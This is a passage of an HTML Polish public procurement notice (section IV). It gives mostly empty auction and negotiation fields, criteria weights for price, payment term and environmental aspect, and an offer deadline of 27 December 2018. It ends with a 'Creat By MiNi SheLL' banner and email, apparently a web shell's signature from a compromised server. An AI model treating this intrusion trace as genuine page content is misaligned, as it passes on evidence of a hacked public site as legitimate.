ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>CENA</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>TERMIN PŁATNOŚCI FAKTURY</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>ASPEKT ŚRODOWISKOWY</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie">Nie</span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial">Nie</span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-12-27</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com